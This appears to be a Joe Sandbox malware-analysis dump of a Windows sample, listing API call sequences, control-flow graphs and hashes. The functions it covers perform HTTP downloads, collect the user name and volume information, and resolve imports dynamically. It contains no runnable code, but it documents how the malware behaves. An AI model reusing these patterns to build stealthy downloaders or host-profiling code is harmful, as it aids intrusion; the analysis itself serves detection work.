                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: d0ac60c43f9efb25e51dd86f7576f02d3bb0ac498c2ca2f16ba5c7137cc49503
                                        • Instruction ID: 84fab0ea86c7ae38e49a86d5d12ed0fe4f76a961a8563b8336984f29613675c8
                                        • Opcode Fuzzy Hash: d0ac60c43f9efb25e51dd86f7576f02d3bb0ac498c2ca2f16ba5c7137cc49503
                                        • Instruction Fuzzy Hash: 8241C0717DA708EE8B78B7A88C7EBDD7A565F42706F907045AC21B73C0CB705A008597

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1033 e162d0-e1635b call e2aab0 call e14800 call e2aa50 InternetOpenA StrCmpCA 1040 e16364-e16368 1033->1040 1041 e1635d 1033->1041 1042 e16559-e16575 call e2aab0 call e2ab10 * 2 1040->1042 1043 e1636e-e16392 InternetConnectA 1040->1043 1041->1040 1062 e16578-e1657d 1042->1062 1045 e16398-e1639c 1043->1045 1046 e1654f-e16553 InternetCloseHandle 1043->1046 1048 e163aa 1045->1048 1049 e1639e-e163a8 1045->1049 1046->1042 1051 e163b4-e163e2 HttpOpenRequestA 1048->1051 1049->1051 1053 e16545-e16549 InternetCloseHandle 1051->1053 1054 e163e8-e163ec 1051->1054 1053->1046 1056 e16415-e16455 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 e163ee-e1640f InternetSetOptionA 1054->1057 1059 e16457-e16477 call e2aa50 call e2ab10 * 2 1056->1059 1060 e1647c-e1649b call e28ad0 1056->1060 1057->1056 1059->1062 1067 e16519-e16539 call e2aa50 call e2ab10 * 2 1060->1067 1068 e1649d-e164a4 1060->1068 1067->1062 1071 e16517-e1653f InternetCloseHandle 1068->1071 1072 e164a6-e164d0 InternetReadFile 1068->1072 1071->1053 1076 e164d2-e164d9 1072->1076 1077 e164db 1072->1077 1076->1077 1080 e164dd-e16515 call e2acc0 call e2abb0 call e2ab10 1076->1080 1077->1071 1080->1072
                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
                                          • Part of subcall function 00E14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • InternetOpenA.WININET(00E30DFF,00000001,00000000,00000000,00000000), ref: 00E16331
                                        • StrCmpCA.SHLWAPI(?,01A8F1A8), ref: 00E16353
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16385
                                        • HttpOpenRequestA.WININET(00000000,GET,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E163D5
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E1640F
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E16421
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E1644D
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E164BD
                                        • InternetCloseHandle.WININET(00000000), ref: 00E1653F
                                        • InternetCloseHandle.WININET(00000000), ref: 00E16549
                                        • InternetCloseHandle.WININET(00000000), ref: 00E16553
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: 856aa213519692172c4632bb981459b37699372400853122a2c803e7ebb56db0
                                        • Instruction ID: c4e84c6b741df3c6a0b6a97bc30696dd91f17776d1254b44ecdf1a6d682a8a0d
                                        • Opcode Fuzzy Hash: 856aa213519692172c4632bb981459b37699372400853122a2c803e7ebb56db0
                                        • Instruction Fuzzy Hash: 67717E71A00218EBDB24DFA4DC59BEEB7B5BF44700F1094A8F10A7B184DBB56A84CF51

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1356 e27690-e276da GetWindowsDirectoryA 1357 e276e3-e27757 GetVolumeInformationA call e28e90 * 3 1356->1357 1358 e276dc 1356->1358 1365 e27768-e2776f 1357->1365 1358->1357 1366 e27771-e2778a call e28e90 1365->1366 1367 e2778c-e277a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1368 e277b8-e277e8 wsprintfA call e2aa50 1367->1368 1369 e277a9-e277b6 call e2aa50 1367->1369 1377 e2780e-e2781e 1368->1377 1369->1377
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E276D2
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2770F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27793
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E2779A
                                        • wsprintfA.USER32 ref: 00E277D0
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: 56cdd2fbe7e046886a2734f6f49b43f23c1520bad4bd4cbe96a852002ce5ee5b
                                        • Instruction ID: 9314d6c8cf8f6da73509669ceab96930632d82679c34464b3b1091409054f514
                                        • Opcode Fuzzy Hash: 56cdd2fbe7e046886a2734f6f49b43f23c1520bad4bd4cbe96a852002ce5ee5b
                                        • Instruction Fuzzy Hash: B741B4B1D04358DBDB10DF94DC45BDEBBB8AF08704F141099F649BB280D775AA44CBA5
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27A10
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E27A17
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E27A2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: da5d5cb3fc5e1cc9fcb06ae46cd422c7e118c4875a3832488d7028b8acbb948d
                                        • Instruction ID: d3ede0110cac9f483804dd3cb0a311a6c1f910bb14af6d5ccc433300715b13cf
                                        • Opcode Fuzzy Hash: da5d5cb3fc5e1cc9fcb06ae46cd422c7e118c4875a3832488d7028b8acbb948d
                                        • Instruction Fuzzy Hash: 77F04FB1D44209EBC710DF99DD45BAEFBB8EB05B21F10025AFA15A6680C77955008BE1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: df547dcf61afa436f9f10a10a31eae7ddd94e14ed30ab2c05c05484945590845
                                        • Instruction ID: e4c8b68684d2bc94604d5e1cd7de91396804c51975ee27b898ac5b5e086a96ef
                                        • Opcode Fuzzy Hash: df547dcf61afa436f9f10a10a31eae7ddd94e14ed30ab2c05c05484945590845
                                        • Instruction Fuzzy Hash: E7D05E74A0030CABCB14DFE598496DDBBB9FB08715F0005D8D90572240EA319481CBA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 633 e29f20-e29f2a 634 e29f30-e2a341 GetProcAddress * 43 633->634 635 e2a346-e2a3da LoadLibraryA * 8 633->635 634->635 636 e2a456-e2a45d 635->636 637 e2a3dc-e2a451 GetProcAddress * 5 635->637 638 e2a463-e2a521 GetProcAddress * 8 636->638 639 e2a526-e2a52d 636->639 637->636 638->639 640 e2a5a8-e2a5af 639->640 641 e2a52f-e2a5a3 GetProcAddress * 5 639->641 642 e2a647-e2a64e 640->642 643 e2a5b5-e2a642 GetProcAddress * 6 640->643 641->640 644 e2a654-e2a72a GetProcAddress * 9 642->644 645 e2a72f-e2a736 642->645 643->642 644->645 646 e2a7b2-e2a7b9 645->646 647 e2a738-e2a7ad GetProcAddress * 5 645->647 648 e2a7bb-e2a7e7 GetProcAddress * 2 646->648 649 e2a7ec-e2a7f3 646->649 647->646 648->649 650 e2a825-e2a82c 649->650 651 e2a7f5-e2a820 GetProcAddress * 2 649->651 652 e2a922-e2a929 650->652 653 e2a832-e2a91d GetProcAddress * 10 650->653 651->650 654 e2a92b-e2a988 GetProcAddress * 4 652->654 655 e2a98d-e2a994 652->655 653->652 654->655 656 e2a996-e2a9a9 GetProcAddress 655->656 657 e2a9ae-e2a9b5 655->657 656->657 658 e2a9b7-e2aa13 GetProcAddress * 4 657->658 659 e2aa18-e2aa19 657->659 658->659
                                        APIs
                                        • GetProcAddress.KERNEL32(77190000,01A76498), ref: 00E29F3D
                                        • GetProcAddress.KERNEL32(77190000,01A764B8), ref: 00E29F55
                                        • GetProcAddress.KERNEL32(77190000,01A88F60), ref: 00E29F6E
                                        • GetProcAddress.KERNEL32(77190000,01A88F30), ref: 00E29F86
                                        • GetProcAddress.KERNEL32(77190000,01A88FA8), ref: 00E29F9E
                                        • GetProcAddress.KERNEL32(77190000,01A8D0F0), ref: 00E29FB7
                                        • GetProcAddress.KERNEL32(77190000,01A7A538), ref: 00E29FCF
                                        • GetProcAddress.KERNEL32(77190000,01A8D2B8), ref: 00E29FE7
                                        • GetProcAddress.KERNEL32(77190000,01A8D300), ref: 00E2A000
                                        • GetProcAddress.KERNEL32(77190000,01A8D0D8), ref: 00E2A018
                                        • GetProcAddress.KERNEL32(77190000,01A8D0C0), ref: 00E2A030
                                        • GetProcAddress.KERNEL32(77190000,01A766B8), ref: 00E2A049
                                        • GetProcAddress.KERNEL32(77190000,01A764F8), ref: 00E2A061
                                        • GetProcAddress.KERNEL32(77190000,01A766D8), ref: 00E2A079
                                        • GetProcAddress.KERNEL32(77190000,01A76758), ref: 00E2A092
                                        • GetProcAddress.KERNEL32(77190000,01A8D138), ref: 00E2A0AA
                                        • GetProcAddress.KERNEL32(77190000,01A8D180), ref: 00E2A0C2
                                        • GetProcAddress.KERNEL32(77190000,01A7A560), ref: 00E2A0DB
                                        • GetProcAddress.KERNEL32(77190000,01A765B8), ref: 00E2A0F3
                                        • GetProcAddress.KERNEL32(77190000,01A8D2D0), ref: 00E2A10B
                                        • GetProcAddress.KERNEL32(77190000,01A8D048), ref: 00E2A124
                                        • GetProcAddress.KERNEL32(77190000,01A8D1F8), ref: 00E2A13C
                                        • GetProcAddress.KERNEL32(77190000,01A8D150), ref: 00E2A154
                                        • GetProcAddress.KERNEL32(77190000,01A76578), ref: 00E2A16D
                                        • GetProcAddress.KERNEL32(77190000,01A8D2E8), ref: 00E2A185
                                        • GetProcAddress.KERNEL32(77190000,01A8D060), ref: 00E2A19D
                                        • GetProcAddress.KERNEL32(77190000,01A8D228), ref: 00E2A1B6
                                        • GetProcAddress.KERNEL32(77190000,01A8D318), ref: 00E2A1CE
                                        • GetProcAddress.KERNEL32(77190000,01A8D2A0), ref: 00E2A1E6
                                        • GetProcAddress.KERNEL32(77190000,01A8D168), ref: 00E2A1FF
                                        • GetProcAddress.KERNEL32(77190000,01A8D198), ref: 00E2A217
                                        • GetProcAddress.KERNEL32(77190000,01A8D108), ref: 00E2A22F
                                        • GetProcAddress.KERNEL32(77190000,01A8D030), ref: 00E2A248
                                        • GetProcAddress.KERNEL32(77190000,01A7F988), ref: 00E2A260
                                        • GetProcAddress.KERNEL32(77190000,01A8D1B0), ref: 00E2A278
                                        • GetProcAddress.KERNEL32(77190000,01A8D1C8), ref: 00E2A291
                                        • GetProcAddress.KERNEL32(77190000,01A764D8), ref: 00E2A2A9
                                        • GetProcAddress.KERNEL32(77190000,01A8D258), ref: 00E2A2C1
                                        • GetProcAddress.KERNEL32(77190000,01A76518), ref: 00E2A2DA
                                        • GetProcAddress.KERNEL32(77190000,01A8D078), ref: 00E2A2F2
                                        • GetProcAddress.KERNEL32(77190000,01A8D090), ref: 00E2A30A
                                        • GetProcAddress.KERNEL32(77190000,01A76778), ref: 00E2A323
                                        • GetProcAddress.KERNEL32(77190000,01A76538), ref: 00E2A33B
                                        • LoadLibraryA.KERNEL32(01A8D120,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A34D
                                        • LoadLibraryA.KERNEL32(01A8D0A8,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A35E
                                        • LoadLibraryA.KERNEL32(01A8D1E0,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A370
                                        • LoadLibraryA.KERNEL32(01A8D210,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A382
                                        • LoadLibraryA.KERNEL32(01A8D240,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A393
                                        • LoadLibraryA.KERNEL32(01A8D270,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A3A5
                                        • LoadLibraryA.KERNEL32(01A8D288,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A3B7
                                        • LoadLibraryA.KERNEL32(01A8D5B8,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A3C8
                                        • GetProcAddress.KERNEL32(77040000,01A762F8), ref: 00E2A3EA
                                        • GetProcAddress.KERNEL32(77040000,01A8D378), ref: 00E2A402
                                        • GetProcAddress.KERNEL32(77040000,01A88878), ref: 00E2A41A
                                        • GetProcAddress.KERNEL32(77040000,01A8D4B0), ref: 00E2A433
                                        • GetProcAddress.KERNEL32(77040000,01A76258), ref: 00E2A44B
                                        • GetProcAddress.KERNEL32(73D20000,01A7A588), ref: 00E2A470
                                        • GetProcAddress.KERNEL32(73D20000,01A76278), ref: 00E2A489
                                        • GetProcAddress.KERNEL32(73D20000,01A7A218), ref: 00E2A4A1
                                        • GetProcAddress.KERNEL32(73D20000,01A8D420), ref: 00E2A4B9
                                        • GetProcAddress.KERNEL32(73D20000,01A8D588), ref: 00E2A4D2
                                        • GetProcAddress.KERNEL32(73D20000,01A76198), ref: 00E2A4EA
                                        • GetProcAddress.KERNEL32(73D20000,01A76138), ref: 00E2A502
                                        • GetProcAddress.KERNEL32(73D20000,01A8D528), ref: 00E2A51B
                                        • GetProcAddress.KERNEL32(768D0000,01A761B8), ref: 00E2A53C
                                        • GetProcAddress.KERNEL32(768D0000,01A76378), ref: 00E2A554
                                        • GetProcAddress.KERNEL32(768D0000,01A8D3C0), ref: 00E2A56D
                                        • GetProcAddress.KERNEL32(768D0000,01A8D390), ref: 00E2A585
                                        • GetProcAddress.KERNEL32(768D0000,01A76178), ref: 00E2A59D
                                        • GetProcAddress.KERNEL32(75790000,01A7A268), ref: 00E2A5C3
                                        • GetProcAddress.KERNEL32(75790000,01A7A5B0), ref: 00E2A5DB
                                        • GetProcAddress.KERNEL32(75790000,01A8D468), ref: 00E2A5F3
                                        • GetProcAddress.KERNEL32(75790000,01A76398), ref: 00E2A60C
                                        • GetProcAddress.KERNEL32(75790000,01A76338), ref: 00E2A624
                                        • GetProcAddress.KERNEL32(75790000,01A7A6C8), ref: 00E2A63C
                                        • GetProcAddress.KERNEL32(75A10000,01A8D5A0), ref: 00E2A662
                                        • GetProcAddress.KERNEL32(75A10000,01A76318), ref: 00E2A67A
                                        • GetProcAddress.KERNEL32(75A10000,01A888F8), ref: 00E2A692
                                        • GetProcAddress.KERNEL32(75A10000,01A8D360), ref: 00E2A6AB
                                        • GetProcAddress.KERNEL32(75A10000,01A8D5D0), ref: 00E2A6C3
                                        • GetProcAddress.KERNEL32(75A10000,01A763D8), ref: 00E2A6DB
                                        • GetProcAddress.KERNEL32(75A10000,01A763B8), ref: 00E2A6F4
                                        • GetProcAddress.KERNEL32(75A10000,01A8D3D8), ref: 00E2A70C
                                        • GetProcAddress.KERNEL32(75A10000,01A8D570), ref: 00E2A724
                                        • GetProcAddress.KERNEL32(76850000,01A76018), ref: 00E2A746
                                        • GetProcAddress.KERNEL32(76850000,01A8D4E0), ref: 00E2A75E
                                        • GetProcAddress.KERNEL32(76850000,01A8D3A8), ref: 00E2A776
                                        • GetProcAddress.KERNEL32(76850000,01A8D5E8), ref: 00E2A78F
                                        • GetProcAddress.KERNEL32(76850000,01A8D438), ref: 00E2A7A7
                                        • GetProcAddress.KERNEL32(75690000,01A76298), ref: 00E2A7C8
                                        • GetProcAddress.KERNEL32(75690000,01A76038), ref: 00E2A7E1
                                        • GetProcAddress.KERNEL32(769C0000,01A76158), ref: 00E2A802
                                        • GetProcAddress.KERNEL32(769C0000,01A8D600), ref: 00E2A81A
                                        • GetProcAddress.KERNEL32(6F8C0000,01A762B8), ref: 00E2A840
                                        • GetProcAddress.KERNEL32(6F8C0000,01A76218), ref: 00E2A858
                                        • GetProcAddress.KERNEL32(6F8C0000,01A76058), ref: 00E2A870
                                        • GetProcAddress.KERNEL32(6F8C0000,01A8D408), ref: 00E2A889
                                        • GetProcAddress.KERNEL32(6F8C0000,01A763F8), ref: 00E2A8A1
                                        • GetProcAddress.KERNEL32(6F8C0000,01A76238), ref: 00E2A8B9
                                        • GetProcAddress.KERNEL32(6F8C0000,01A76118), ref: 00E2A8D2
                                        • GetProcAddress.KERNEL32(6F8C0000,01A761D8), ref: 00E2A8EA
                                        • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00E2A901
                                        • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00E2A917
                                        • GetProcAddress.KERNEL32(75D90000,01A8D618), ref: 00E2A939
                                        • GetProcAddress.KERNEL32(75D90000,01A88868), ref: 00E2A951
                                        • GetProcAddress.KERNEL32(75D90000,01A8D330), ref: 00E2A969
                                        • GetProcAddress.KERNEL32(75D90000,01A8D498), ref: 00E2A982
                                        • GetProcAddress.KERNEL32(76470000,01A76078), ref: 00E2A9A3
                                        • GetProcAddress.KERNEL32(6D900000,01A8D348), ref: 00E2A9C4
